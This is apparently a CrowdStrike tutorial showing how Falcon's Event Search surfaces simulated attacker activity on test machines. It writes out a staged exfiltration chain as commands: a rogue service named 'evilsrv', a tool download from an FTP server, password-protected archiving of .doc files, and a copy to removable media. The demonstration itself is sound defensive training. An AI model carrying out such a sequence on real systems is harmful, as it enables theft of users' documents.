Five Second Enterprise Visibility
Introduction
Visibility is an essential element in next generation endpoint protection.
In this Article we’ll run through a series of commands that might be used in any number of attacks. We’ll then highlight ways to identify these commands in the Falcon user interface, demonstrating how quickly detailed information is available to the security admin.
Video
The CrowdStrike Solution
While legacy endpoint security products were limited to either blocking or allowing an activity, next generation endpoint protection products add the ability to record activity on the endpoint and store it in a database for future search and investigation. While this may sound like a simple concept, there are actually vast differences in the way that this can be implemented.
CrowdStrike delivers superior visibility as a result of its unique architecture. The key points to know about this architecture are:
- The Falcon sensor does more than just record and store events. It puts events in context. It is trivial to simply record events and dump them into a database. This creates a garbage-in-garbage-out scenario for admins that ends up wasting time and driving up infrastructure costs. The Falcon platform takes a different approach. It actually links related events together to paint an accurate picture of the state of the machine. It then displays that picture to the admin (rather than a stream of unrelated events). Understanding individual events as part of a broader process tree allows the sensor to then apply security logic derived from CrowdStrike intelligence. If a sequence of events matches a known indicator of attack, the Falcon sensor will identify the activity as malicious, send a detection alert to the administrator and also block the threat.
- Events recorded by the Falcon sensor are streamed to the cloud and stored in a graph database. This approach ensures that data is accessible to the administrator even if some systems are offline at the time of the search. It also ensures reliability, speed, and scalability. The CrowdStrike graph database – known as the Threat Graph – is designed to quickly return results for all queries, regardless of the size or the amount of data in the database.
This architecture allows Falcon Endpoint Protection to provide deep visibility across your entire environment in five seconds or less.
Step-By-Step Procedure
These scenarios will show the speed at which those events can be searched from the Falcon Investigate App → Event Search. These use cases represent a tiny subset of the events that are recorded and made searchable. Please contact us to learn about all of our visibility and search capabilities.
Step 1
Go to CrowdStrike Falcon Endpoint Protection Login Page and login
Step 2
Navigate to Events Search page by going to Investigate then, “Event Search”.
Step 3
Switch to Test System 1 and start Remote Desktop connection to Test System 2. This remote connection will be recorded by Falcon.
You can search for this activity in the events app by entering the following search: ComputerName=hostname IoSessionConnected
The results will show that the connection occurred and also provide contextual details of the connection.
Step 4
Return to the RDP session and choose to run the Windows Command Prompt as Administrator. When prompted, choose Yes to the User Account Control (UAC) prompt.
Return to the Events App and enter the following search: ComputerName=hostname UACExeElevation
The results will show that CMD started, but it will also show the contextual events around the execution along with the details of the UAC elevation.
Step 5
Return to the RDP session and type “whoami” in the Windows Command Prompt
Go back to the Events App and enter the following search: ComputerName=hostname whoami
The results show that the Falcon sensor can not only see that CMD started, but that it can also see all command activity. Similarly, you can search for activity by user with the following search: ComputerName=hostname UserIdentity
Step 6
Return to the RDP session and type “powershell” in the Windows Command Prompt. If we execute the next few commands from PowerShell within a Windows Command Prompt, then many of the activities will be obfuscated (a common attacker technique). However, Falcon can see through this obfuscation technique.
In CMD change directory to the desktop and then type “mkdir exfil”
This creates a folder for us to stage data that we will later attempt to exfiltrate.
Go back to the Events App and enter the following search: ComputerName=hostname DirectoryCreate
We can immediately see the creation of the new directory.
Step 7
Return to the RDP session. In CMD change directory to the exfil directory. Then type: New-Service -name evilsrv -DisplayName “Evil Service” -BinaryPathName C:\Windows\System32\PING.EXE
Go back to the Events App and enter the following search: ComputerName=hostname CreateService
The results tell us that a service was created, but it also shows us all of the context around the service. For example, it also tells us that its purpose is to launch PING.EXE.
THE FOLLOWING STEPS REQUIRE AN FTP SERVER AND A RAR UTILITY
Step 8
Return to the RDP session. Download a RAR utility from an FTP server in CMD with a command like: Invoke-WebRequest -uri ftp://ftpserver/Rar.exe -OutFile rar.exe
Go to Events App and see that the RAR utility was written with the following search: ComputerName=hostname PeFileWritten
Return to the RDP session. Add all .doc files to a RAR archive and password protect it in CMD with a command like: .\rar.exe a -hpPassword ..\*.doc
Go to Events Search and see that the data was archived with the following search: ComputerName=hostname RarFileWritten You can also get the details of the archive utility with the following search: ComputerName=hostname rar.exe
The critical thing to know about this data preparation phase is that it was all done inside an existing PowerShell process. This obfuscation technique makes the FTP and RAR activity invisible to most tools, but Falcon can still see it. In fact, Falcon can even detect when an attacker tries to hide an archive file by giving it a benign extension like .txt. This is true because Falcon doesn’t simply look at the file extension; instead, it looks at the entire sequence of events In this example, it can see that an archiving utility was used to create the file before it was renamed to .txt.
Step 9
Falcon can also see removable media activity. To proceed, insert removable media to your test system or mount removable media to your VM. Go to Events App and see that removable media was mounted with the following search: ComputerName=hostname FsVolumeMounted
To continue our data exfiltration example, go to CMD and type: copy .\exfil.rar e:\
This copies the archived data to the removable media device. To see this in the Events App, return to the events app and type the following search: ComputerName=hostname CommandHistory
These search results include all commands executed on the system. This is a quick and easy way to see attacker activity because they typically prefer to use command line interfaces. In this example, you can see the entire attack chain summarized in one simple event.
Conclusion
CrowdStrike Falcon® Endpoint Protection makes it quick and easy to get visibility across your entire organization. The solution is SaaS-based and built on a graph database. This means that administrators get unlimited scalability without any need to invest in on-premise hardware. More importantly, it means that administrators can always get immediate responses to their queries – regardless of deployment size. This document showed a small subset of the events that Falcon captures, and also showed how quickly they can be searched for in the Events App. CrowdStrike is continually adding additional visibility features, so please contact us for the latest information.